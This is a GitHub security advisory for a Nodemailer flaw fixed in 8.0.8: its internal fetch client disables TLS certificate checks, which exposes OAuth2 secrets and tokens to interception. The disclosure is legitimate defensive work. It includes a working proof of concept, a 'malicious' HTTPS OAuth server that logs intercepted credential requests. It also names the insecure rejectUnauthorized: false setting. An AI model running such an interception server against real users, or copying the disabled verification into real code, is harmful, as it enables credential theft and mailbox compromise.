GHSA-r7g4-qg5f-qqm2
ADVISORY - githubSummary
Summary
Nodemailer disables TLS certificate verification in its internal HTTPS fetch client through the use of rejectUnauthorized: false inside lib/fetch/index.js.
As a result, OAuth2 token requests trust invalid or self-signed HTTPS certificates and transmit sensitive OAuth credentials over connections that should fail TLS validation.
An attacker in a machine-in-the-middle position can intercept OAuth2 credential exchanges and capture:
- OAuth client_secret
- refresh_token
- access tokens
The issue was verified through runtime testing using a self-signed HTTPS OAuth endpoint.
Details
Root Cause
The issue originates from the internal HTTPS fetch implementation used by Nodemailer for OAuth2 token retrieval and related outbound HTTPS requests.
Inside:
lib/fetch/index.js
the request options contain:
rejectUnauthorized: false
This disables TLS peer certificate verification globally for the internal HTTPS client unless explicitly overridden through optional TLS configuration.
As a result:
- self-signed certificates are trusted
- invalid CA chains are accepted
- hostname validation is bypassed
- attacker-controlled HTTPS endpoints are treated as trusted
This violates expected HTTPS security guarantees.
Vulnerable Flow
The vulnerable execution chain is:
OAuth2 Transport ↓ XOAuth2 token generation ↓ Internal HTTPS fetch client ↓ HTTPS request with rejectUnauthorized:false ↓ Attacker-controlled/self-signed endpoint trusted ↓ OAuth credentials transmitted
PoC
Environment
Mail API (app/server.js)
const express = require("express");
const nodemailer = require("nodemailer");
require("dotenv").config();
const app = express();
app.use(express.json());
const transporter = nodemailer.createTransport({
host: process.env.SMTP_HOST,
port: process.env.SMTP_PORT,
secure: false,
auth: {
user: process.env.SMTP_USER,
pass: process.env.SMTP_PASS
}
});
app.post("/send", async (req, res) => {
try {
const { to, subject, text, html } = req.body;
const info = await transporter.sendMail({
from: `"Mailer" <${process.env.SMTP_USER}>`,
to,
subject,
text,
html
});
res.json({
success: true,
messageId: info.messageId
});
} catch (err) {
console.error(err);
res.status(500).json({
success: false,
error: err.message
});
}
});
app.listen(process.env.PORT, () => {
console.log(`Mailer running on port ${process.env.PORT}`);
});
Malicious HTTPS OAuth Server (poc/evil-oauth.js)
const https = require('https');
const fs = require('fs');
https.createServer({
key: fs.readFileSync('./key.pem'),
cert: fs.readFileSync('./cert.pem')
}, (req, res) => {
console.log('\n==== REQUEST INTERCEPTED ====');
console.log(req.method, req.url);
let body = '';
req.on('data', chunk => {
body += chunk;
});
req.on('end', () => {
console.log('\nPOST BODY:');
console.log(body);
res.writeHead(200, {
'Content-Type': 'application/json'
});
res.end(JSON.stringify({
access_token: 'attacker_token',
expires_in: 3600
}));
});
}).listen(8443, () => {
console.log('Malicious HTTPS OAuth server listening on 8443');
});
Nodemailer OAuth2 Test (test.js)
const nodemailer = require('./');
const transporter = nodemailer.createTransport({
service: 'gmail',
auth: {
type: 'OAuth2',
user: 'redacted@example.com',
clientId: 'CLIENT_ID_REDACTED',
clientSecret: 'CLIENT_SECRET_REDACTED',
refreshToken: 'REFRESH_TOKEN_REDACTED',
accessUrl: 'https://localhost:8443/token'
}
});
transporter.sendMail({
from: 'redacted@example.com',
to: 'redacted@example.com',
subject: 'PoC',
text: 'test'
}, (err, info) => {
console.log('\n==== NODEMAILER RESULT ====');
if (err) {
console.error(err);
} else {
console.log(info);
}
});
Steps to Reproduce
- Start malicious HTTPS OAuth server:
- node poc/evil-oauth.js
- Run Nodemailer OAuth2 test:
- node test.js
- Observe intercepted OAuth2 request body on the malicious HTTPS server.
PIC
Impact
- OAuth credential theft
- unauthorized email access
- persistent token abuse
- unauthorized mail sending
- mailbox compromise
- interception/tampering of OAuth responses
The issue effectively downgrades HTTPS security protections for sensitive OAuth credential exchanges.
Common Weakness Enumeration (CWE)
Improper Certificate Validation
GitHub
2.2
CVSS SCORE
6.5medium| Package | Type | OS Name | OS Version | Affected Ranges | Fix Versions |
|---|---|---|---|---|---|
| nodemailer | npm | - | - | <=8.0.7 | 8.0.8 |
CVSS:3 Severity and metrics
The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.
The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
A successful attack depends on conditions beyond the attacker's control, requiring investing a measurable amount of effort in research, preparation, or execution against the vulnerable component before a successful attack.
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
The vulnerable system can be exploited without interaction from any user.
An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.
Modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. The data modification does not have a direct, serious impact on the impacted component.
There is no impact to availability within the impacted component.
Chainguard
CGA-78rq-x89j-gpq5
-
minimos
MINI-2356-5mc3-vp43
-
minimos
MINI-6xvg-3xgj-h455
-
minimos
MINI-h3hx-6jxx-925q
-
minimos
MINI-vff6-5px5-f8mx
-
minimos
MINI-vwqq-xp74-j487
-